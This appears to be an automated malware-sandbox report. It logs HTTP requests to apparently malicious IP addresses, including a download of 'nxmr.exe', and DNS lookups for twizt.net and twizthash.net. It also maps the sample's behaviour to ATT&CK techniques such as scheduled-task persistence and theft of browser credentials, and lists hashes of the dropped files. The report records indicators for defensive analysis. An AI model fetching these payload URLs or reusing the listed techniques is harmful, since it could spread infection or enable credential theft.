970 B 21.3kB 14 19
HTTP Request
GET http://185.215.113.66/1HTTP Response
200HTTP Request
GET http://185.215.113.66/2HTTP Response
200 -
1.9kB 53.1kB 35 41
HTTP Request
GET http://185.215.113.66/2HTTP Response
200HTTP Request
GET http://185.215.113.66/3HTTP Response
200 -
127.5kB 6.0MB 2606 4297
HTTP Request
GET http://185.215.113.84/nxmr.exeHTTP Response
200 -
2.2kB 79.4kB 41 60
HTTP Request
GET http://185.215.113.66/3HTTP Response
200HTTP Request
GET http://185.215.113.66/4HTTP Response
200 -
1.9kB 66.3kB 34 52
HTTP Request
GET http://185.215.113.66/4HTTP Response
200HTTP Request
GET http://185.215.113.66/5HTTP Response
404 -
362 B 860 B 4 3
HTTP Request
GET http://91.202.233.141/IBSTSWSONLHTTP Response
404 -
1.4kB 4.0kB 13 8
HTTP Request
GET http://91.202.233.141/1HTTP Response
404HTTP Request
GET http://91.202.233.141/2HTTP Response
404HTTP Request
GET http://91.202.233.141/3HTTP Response
404HTTP Request
GET http://91.202.233.141/4HTTP Response
404HTTP Request
GET http://91.202.233.141/5HTTP Response
404 -
1.1kB 3.7kB 12 11
-
144 B 92 B 3 2
-
152 B 3
-
152 B 3
-
152 B 3
-
55 B 71 B 1 1
DNS Request
twizt.net
DNS Response
185.215.113.66
-
59 B 75 B 1 1
DNS Request
twizthash.net
DNS Response
185.215.113.66
-
70 B 140 B 1 1
DNS Request
www.update.microsoft.com
DNS Response
20.109.209.108
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
-
64 B 1
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD58ce09f13942ab5bcb81b175996c8385f
SHA16fa685d66ac5fff4e9d984dc1903c47a1a6b6cbd
SHA256757bf8be40693456e7cdee5c53416d1cb223da5f7d0b9d55f4aca95f6a57605d
SHA51211ae4651b3dd55355b2cb7bf2f6b042dea47bb895f898d967d63ee652652c633cc5becf31cb2fd7f8797b238b264195d09d4e08211b797eae29e2a7bb31b277f
-
Filesize
745B
MD58173b6b8d13317cfd59904e50ed1a5ea
SHA1eac71a4715c26c59f215f56cf28ed74b1210ceca
SHA256bdda60acdd87a63edc1f37dc397549180547a9b5130e74ac4304dd95ed2717ae
SHA5127745c8ddcf34125a011da5262c3b046848acfa18fe18d4df987746d201778f84b0b313042bdc2b362054fcd7db94719615fa0bdb1aab2308480a0e70f33174fc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ff293aed5505000cab8831784b853ae2
SHA153f50192a408a614142372b24a9a012c3681d25e
SHA25623ad28d972d27aff848463f9ab8e88d5d32cce98398d5fed052f6018536f2db3
SHA512c041aa5f737bd4da015372efea6af664c4a4d2bb931ca75255dbdab3d31d50f6d04ccfbc99107e15186316492ae7d3768bc35d6689019ab4286911d2b9a6ecf1
-
Filesize
53KB
MD584897ca8c1aa06b33248956ac25ec20a
SHA1544d5d5652069b3c5e7e29a1ca3eea46b227bbfe
SHA256023ad16f761a35bd7934e392bcf2bbf702f525303b2964e97c3e50d2d5f3eda1
SHA512c17d0e364cf29055dece3e10896f0bbd0ebdb8d2b1c15fe68ddcd9951dd2d1545362f45ad21f26302f3da2eb2ec81340a027cbd4c75cc28491151ecabae65e95
-
Filesize
10KB
MD596509ab828867d81c1693b614b22f41d
SHA1c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
-
Filesize
61KB
MD577c5eb90118287f666886fc34210c176
SHA1d7a59bf4f014304e29df1868ef82fe782432120a
SHA25659a96d66d97e202829ea79a5e0bbf71981c05a13ab700b0120f7d99d33515080
SHA5125577d167ad4748ad7917ff3f792a0caa01ba40638bdf7143c1403d2efcad4019f8da49719ae0ad88febdc1ef64207fba7ca5bb96dc12c334571d30e2e8f22cf9
-
Filesize
9KB
MD5323cb4364490f83204b51b0f7f3766f4
SHA18687a571d083ffef105d0ce61d46845b4dba4793
SHA256efade1639d80b3262d0730a70525dbd703ab51499291b3a1c55b2aa32e74030e
SHA51296a5470e361ee1a164bb637e1bc14434050cbf12d3d3bcae240575d08270dc8038582965cddde508c220ec6aa695dfc87d0633f6735ec3d6e637c4cb25b42a3d
-
Filesize
5.6MB
MD513b26b2c7048a92d6a843c1302618fad
SHA189c2dfc01ac12ef2704c7669844ec69f1700c1ca
SHA2561753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256
SHA512d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455
-
Filesize
79KB
MD50c883b1d66afce606d9830f48d69d74b
SHA1fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5